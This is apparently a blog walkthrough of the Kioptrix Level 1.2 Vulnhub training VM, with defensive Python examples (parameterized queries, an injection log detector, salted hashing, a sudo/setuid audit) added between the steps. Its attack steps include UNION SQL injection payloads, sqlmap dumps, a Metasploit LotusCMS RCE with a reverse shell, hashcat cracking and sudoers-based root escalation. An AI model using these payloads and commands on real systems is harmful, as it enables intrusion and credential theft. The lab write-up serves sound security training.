Vulnhub – Kioptrix: Level 1.2 (#3)

Part 3 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want to get the OSCP certification. The link to download the VM can be found here. Let's get started!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know.

After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still in the realm of the beginner, I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one's own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge: once you find the IP (DHCP client), edit your hosts file and point it to kioptrix3.com.

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to do this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine: 192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM at 192.168.182.153.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

Running a scan with nmap, I found OpenSSH 4.7p1 Debian 8ubuntu1.2 on port 22/tcp and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) on port 80/tcp. The VM's OS is Linux 2.6.X. From the nmap results I can guess that we will be doing some web exploitation.

root@kali:~# nmap -A -T4 192.168.182.153

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST
Nmap scan report for kioptrix3.com (192.168.182.153)
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:58:63:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms kioptrix3.com (192.168.182.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@kali:~# 

Running Nikto, I could see that the web server hosts phpMyAdmin, a free tool written in PHP for administering MySQL over the web (I smell a SQL injection later in the pentest).

root@kali:~# nikto -host http://192.168.182.153/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.153
+ Target Hostname:    192.168.182.153
+ Target Port:        80
+ Start Time:         2017-03-02 00:24:51 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 14:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-03-02 00:25:05 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 
 

I first went to the site and found out it was a blog. I already knew it had phpMyAdmin because of the Nikto scan, but I also found out it had a gallery.

After browsing the site, I went to “Ligoat Press Room”, clicked on the sorting options and a photo ID, and found that the URL had an “id” parameter, which could signify a SQL injection vulnerability. After putting a ' after php?id=1, the server returned a SQL error. This site is vulnerable to SQL injection!
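To show why a single quote produces a database error and why a UNION can read other tables, here is an added example (not code from the original post or from the gallery application) that reproduces the bug pattern behind a query like gallery.php?id= against a toy SQLite database, beside the hardened version that validates and binds the parameter. The schema, table contents and function names are constructed for the example.

```python
import sqlite3

# Constructed toy schema standing in for the gallery database from the
# write-up: a photos table looked up by ?id= and the dev_accounts table that
# gets dumped. Table layout and values are illustrative, not the VM's data.
SCHEMA = """
CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, filename TEXT);
CREATE TABLE dev_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO photos VALUES (1, 'Press room', 'press.jpg'), (2, 'Goat', 'goat.jpg');
INSERT INTO dev_accounts VALUES (1, 'dreg', 'HASH_PLACEHOLDER_1'),
                                (2, 'loneferret', 'HASH_PLACEHOLDER_2');
"""


def open_db():
    """Fresh in-memory SQLite database loaded with the toy schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def photo_by_id_vulnerable(conn, raw_id):
    """The bug pattern behind gallery.php?id=: the request value is pasted
    straight into the SQL text. A stray quote breaks the syntax (the error
    seen in the write-up) and a UNION reads any other table."""
    sql = "SELECT id, title, filename FROM photos WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def photo_by_id_safe(conn, raw_id):
    """Hardened form: validate the type, then bind the value as a parameter
    so the database never parses it as SQL."""
    try:
        photo_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # anything that is not an integer id is rejected
    return conn.execute(
        "SELECT id, title, filename FROM photos WHERE id=?", (photo_id,)
    ).fetchall()


def demo():
    """Run both versions against a normal id, the quote probe and the UNION
    probe from the write-up; returns the outcomes keyed by case."""
    conn = open_db()
    out = {}
    out["normal_vuln"] = photo_by_id_vulnerable(conn, "1")
    out["normal_safe"] = photo_by_id_safe(conn, "1")
    try:
        photo_by_id_vulnerable(conn, "1'")
        out["quote_vuln"] = "no error"
    except sqlite3.OperationalError:
        out["quote_vuln"] = "sql error"  # what the page's id=1' probe triggered
    out["quote_safe"] = photo_by_id_safe(conn, "1'")
    union = "-1 union select id,username,password from dev_accounts--"
    out["union_vuln"] = photo_by_id_vulnerable(conn, union)  # leaks dev_accounts
    out["union_safe"] = photo_by_id_safe(conn, union)        # rejected
    return out


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:12s} {result}")
```

The fix is the combination of both steps: the integer cast rejects anything that is not a photo id, and the bound parameter means that even a value which passes validation is handed to the engine as data rather than spliced into the statement text.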

The last thing I did was check the login portal on the blog site, and I found that it was using LotusCMS, which is vulnerable to the LotusCMS 3.0 eval() Remote Command Execution exploit.

Exploitation

The exploitation will be split into 3 parts: the first is a SQL injection with sqlmap, the second a manual SQL injection, and lastly the LotusCMS 3.0 eval() Remote Command Execution exploit. All 3 produce the same result, the user credentials for the vulnerable VM (which are then used to perform privilege escalation to get root).

SQLi using sqlmap

I will NOT be including all of the output from sqlmap! I did not want to dump that much information, so I only show the commands used and the important output. Knowing that the web server is vulnerable to SQL injection, I fired up sqlmap and ran the command below to enumerate the DBMS databases.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

3 databases were available! I used the next command to list the tables in the gallery database.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

Now we see 7 tables in the gallery database. dev_accounts looks very interesting, so let's dump all of that table's entries and see what we find, using the command below.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

From the dump we can see that we got the usernames and password hashes for dreg and loneferret. We can ssh into the victim's machine using these credentials, but only after we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” unless you want to learn the other methods I used to get the passwords.)

Manual SQLi

Now I will do the SQL injection manually instead of using sqlmap. I used a tutorial which greatly helped me out and which I recommend to you all, called Hacking website using SQL Injection - step by step guide. If you have any questions about how and why I used a certain SQL statement, go to that tutorial, which explains it in more detail, or just leave me a comment.

With that covered, let's get started! We know from checking the site earlier that it is vulnerable to SQL injection, so what I want to know next is how many columns the query returns and which of those columns are displayed on the page. I will use the payload listed below to get this information. NOTE: make sure to put this after the id parameter in the URL.

-1  union select 1,2,3,4,5,6--

From the output we can tell that the query has 6 columns, with columns 2 and 3 being the ones echoed into the page (if you want to know more about how I worked this out, click on the link stated earlier). Next, I will try to find the version of the database. Since we know that column 2 is displayed, we will inject our code into that column. I will use the payload listed below to show exactly how it's done!

-1  union select 1,version(),3,4,5,6--

5.0.51a is a MySQL version string, so we now know which SQL dialect the database speaks. Next we need to find what tables are located in the database and their names. We will inject using the query listed below.

-1  union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--


Table names:

Sweet! We have all the tables in the database, so let's check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: the CHAR() portion of the query is the name dev_accounts spelled out as ASCII codes, which lets the query work without quote characters. We used the tool HackBar to do the conversion.

-1  union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

Almost done! Let's get the database to give us the usernames and password hashes using the injection query below.

-1  union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--

Bingo! We got the username and password hashes for dreg and loneferret. Now on to password cracking. (You can skip the next exploit if you want to continue the pentest, or check out the LotusCMS exploit to see another way of exploiting this VM.)
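Every probe in the sqlmap and manual sections above leaves a distinctive trace in the web server's access log. The following added example (my own code, not from the original post) parses Apache combined-format lines and flags the patterns those probes produce: a quote in a numeric parameter, UNION SELECT, information_schema enumeration, MySQL helper functions and a trailing comment. The log lines are constructed to mirror the requests in this write-up and are not real logs from the VM; the signature list and function names are my own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines modelled on the probes used in this
# write-up (quote test, UNION column count, version(), information_schema
# enumeration) plus two benign requests. Not real logs from the VM.
SAMPLE_LOG = """\
192.168.182.147 - - [02/Mar/2017:00:40:01 -0600] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.182.147 - - [02/Mar/2017:00:40:05 -0600] "GET /gallery/gallery.php?id=1' HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
192.168.182.147 - - [02/Mar/2017:00:41:10 -0600] "GET /gallery/gallery.php?id=-1%20union%20select%201,2,3,4,5,6-- HTTP/1.1" 200 4910 "-" "Mozilla/5.0"
192.168.182.147 - - [02/Mar/2017:00:41:20 -0600] "GET /gallery/gallery.php?id=-1%20union%20select%201,version(),3,4,5,6-- HTTP/1.1" 200 4912 "-" "Mozilla/5.0"
192.168.182.147 - - [02/Mar/2017:00:42:00 -0600] "GET /gallery/gallery.php?id=-1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5002 "-" "Mozilla/5.0"
192.168.182.147 - - [02/Mar/2017:00:43:00 -0600] "GET /gallery/gallery.php?id=2 HTTP/1.1" 200 5133 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Each signature is matched against the percent-decoded parameter value.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("mysql_function", re.compile(r"\b(version|database|group_concat|concat)\s*\(", re.I)),
    ("comment_tail", re.compile(r"(--|#|/\*)\s*$")),
]


def classify_value(value):
    """Return the signature names that fire on one decoded parameter value."""
    reasons = [name for name, rx in SIGNATURES if rx.search(value)]
    if "'" in value or '"' in value:
        reasons.append("quote_probe")
    return reasons


def scan_log(text, numeric_params=("id",)):
    """Walk log lines, decode each query-string parameter and report values
    that match an injection signature or that are non-numeric for a parameter
    the application only ever expects to be an integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                reasons = classify_value(value)
                if param in numeric_params and not re.fullmatch(r"-?\d+", value):
                    reasons.append("non_numeric_id")
                if reasons:
                    findings.append({
                        "ip": m["ip"], "ts": m["ts"], "param": param,
                        "value": value, "reasons": sorted(set(reasons)),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']}  {f['param']}={f['value']!r}  -> {', '.join(f['reasons'])}")
```

The `non_numeric_id` check is the most robust of the signatures: the keyword patterns can be evaded with encoding or case tricks, but a parameter that the application only ever uses as an integer has no legitimate reason to carry anything else, so the check catches the very first quote probe before any UNION is attempted.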

LotusCMS 3.0 eval() Remote Command Execution Exploit

I will use a Metasploit module for the LotusCMS 3.0 eval() Remote Command Execution exploit so we can get a shell.

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.182.153
RHOST => 192.168.182.153
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600

whoami
www-data

So we have a shell. Let's look around.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting. Let's see what's in there.

ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

I snooped around until I found what we were looking for in the gconfig.php file: the MySQL credentials, which also log us into phpMyAdmin!

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I entered the credentials to get into the phpMyAdmin application.

I then went to the gallery database, clicked on the SQL tab and entered the SQL query below.

SELECT * FROM dev_accounts


We now have the usernames and password hashes for dreg and loneferret!

Password Cracking using hashcat

With the two hashes stored in hashes.txt, I started hashcat to crack the passwords (-m 0 selects raw, unsalted MD5). The command is listed below.

root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

The passwords were starwars and Mast3r!
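The reason a wordlist run finishes almost instantly here is that dev_accounts stores raw, unsalted MD5: the hash is a pure function of the password, so every guess costs one cheap hash. The added example below (my own code, not from the original post or the gallery application) confirms the two dumped hashes are exactly MD5 of the recovered words, and shows the storage format that a defender should use instead, a per-user random salt with PBKDF2-HMAC-SHA256 and a constant-time comparison. The record format and function names are my own choices; the iteration count is a constructed example value.

```python
import hashlib
import hmac
import os

# The two hashes as dumped from dev_accounts in the write-up (hashcat mode 0 =
# raw, unsalted MD5) together with the passwords hashcat recovered.
PAGE_HASHES = {
    "5badcaf789d3d1d09794d8f021f40f0e": "starwars",
    "0d3eccfb887aabd50f243b3f155c0f85": "Mast3r",
}


def looks_like_raw_md5(digest):
    """32 lowercase hex chars and nothing else: the shape hashcat -m 0 expects."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest)


def unsalted_md5_matches(digest, candidate):
    """Unsalted MD5 is a pure function of the password, so one hash computation
    settles a guess; this is why a wordlist run finishes in seconds."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest


def hash_password(password, *, salt=None, iterations=200_000):
    """Hardened storage: per-user random salt + PBKDF2-HMAC-SHA256 with a
    high iteration count (200k is an example value). Stored as
    algo$iterations$salt$hash so the parameters travel with the record and
    can be raised later without breaking existing users."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, password):
    """Recompute with the stored parameters and compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for digest, pw in PAGE_HASHES.items():
        kind = "raw md5" if looks_like_raw_md5(digest) else "other"
        print(digest, kind, "matches" if unsalted_md5_matches(digest, pw) else "no match")
    record = hash_password("starwars")
    print(record)
    print(verify_password(record, "starwars"), verify_password(record, "Mast3r"))
```

Two properties of the hardened form matter for this write-up: because each record carries its own random salt, two users with the same password get different records and a cracked hash tells you nothing about any other account; and because every verification costs hundreds of thousands of HMAC operations, the rockyou run that took seconds against MD5 would take orders of magnitude longer.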

Persistence (Linux Privilege Escalation)

Let's ssh into the victim's VM using the loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ 

Let's check the CompanyPolicy.README file; that looks interesting! I also ran sudo -l and whereis ht to gather some additional info.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 

Found a SUID binary! And sudo -l shows that our current user loneferret can run the ht editor as root without a password, so we can edit any file we want. Let's edit the /etc/sudoers file then! Use the command listed below to open the ht text editor. Once it is running, press F3 and then enter /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Once we are in the /etc/sudoers file, add /bin/sh at the end of the loneferret entry. Then press ALT+F to save and CTRL+Z to exit.

Now run sudo /bin/sh for root access:

loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
Kioptrix3
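The escalation above works because of two configuration mistakes that an administrator can find with a quick audit: a NOPASSWD sudo rule for an editor with no argument restriction, and a root-owned setuid/setgid binary in /usr/local/bin. The added example below (my own code, not from the original post) parses the sudo -l and ls -l output shown in this write-up and reports both. The input text is constructed from the lines above, and the editor list, rule regexes and function names are my own assumptions.

```python
import re

# Constructed input modelled on the sudo -l and ls -l output in the write-up.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""
LS_L_OUTPUT = """\
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
-rwxr-xr-x 1 root root   12345 2011-04-16 07:26 /usr/local/bin/harmless
"""

# Programs that read and write arbitrary files when run with root privileges.
# Illustrative list: ht (from the write-up) plus common editors and pagers.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more"}

# "(runas) TAG: command" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>!?\S.*)$")

# Permission string, link count, owner, group, size, date, time, path.
LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+(?P<path>\S+)$"
)


def audit_sudo_rules(text):
    """Flag sudo rules that grant an editor, need no password, carry no
    argument restriction, or rely on '!' negation."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"].strip()
        negated = cmd.startswith("!")
        path = cmd.lstrip("!").split()[0]
        name = path.rsplit("/", 1)[-1]
        tags = {t.rstrip(":") for t in m["tags"].split()}
        issues = []
        if negated:
            # sudoers(5) itself warns that negating commands is not an effective restriction.
            issues.append("'!' negation rule offers no real protection")
        else:
            if "NOPASSWD" in tags:
                issues.append("NOPASSWD")
            if name in FILE_EDITORS:
                issues.append(f"editor '{name}' can open and save any file as {m['runas']}")
            if len(cmd.split()) == 1:
                issues.append("no argument restriction")
        if issues:
            findings.append({"runas": m["runas"], "command": path, "issues": issues})
    return findings


def audit_setuid(text):
    """Parse ls -l lines and report files with the setuid or setgid bit set."""
    findings = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        mode = m["mode"]
        flags = []
        if mode[3] in "sS":
            flags.append("setuid")
        if mode[6] in "sS":
            flags.append("setgid")
        if flags:
            findings.append({"path": m["path"], "owner": m["owner"], "flags": flags})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"sudo {f['runas']}: {f['command']} -> {'; '.join(f['issues'])}")
    for f in audit_setuid(LS_L_OUTPUT):
        print(f"{f['path']} owned by {f['owner']}: {', '.join(f['flags'])}")
```

The fix on the sudo side is not to grant an editor at all: if users genuinely need to edit a specific root-owned file, sudoedit restricted to that file path keeps the editor running as the user and only the final copy is written with privileges. The setuid bits on /usr/local/bin/ht serve no purpose once the sudo rule exists and should simply be removed.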

Conclusion

This was hard compared to the first two and took me a while to get root access. It took some basic SQL knowledge as well as some basic Linux privilege escalation techniques, but I got it done. If you have any feedback you want to give, leave a comment below. Well, it just gets harder from here. On to the next one!

4 comments

  1. I leave a response whenever I especially enjoy an article on a blog or if I have something to
    add to the discussion. It’s triggered by the sincerity communicated in the post I looked at.
    And on this post Vulnhub – Kioptrix: Level 1.2 (#3) – Guillermo Cura,
    I was excited enough to post a comment 😉 I do have a couple of questions for you if you tend not
    to mind. Could it be just me or do some of the remarks appear like they are coming from brain dead people?

    😛 And, if you are writing at other sites, I’d like to follow you.
    Could you list all of your public pages like your LinkedIn profile, Facebook page or Twitter feed?

    1. Thank you! I really do appreciate the positive feedback. Well, we all started somewhere. Most of my writing comes from this site only. I have been working on my GitHub and writing programs from “Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers,” so I will be updating my site to show other things that I have been working on; don’t worry, that will come soon. Yes, I do have a LinkedIn (barely made one) and Facebook, which I will be posting later, but I hardly post anything on FB and just use it as a tool to keep up with friends and not for network security, but I wouldn’t mind adding you. Once again, thanks for the feedback and sorry for the late response. Been real busy lately with other things, so I haven’t had time to do much in my spare time.

    1. Thanks! Glad the material could help. Yea, the material takes a good amount of effort to put together. As of right now I haven’t done any VMs but will soon. Probably do some write-ups on some CTFs I’ll be doing soon.
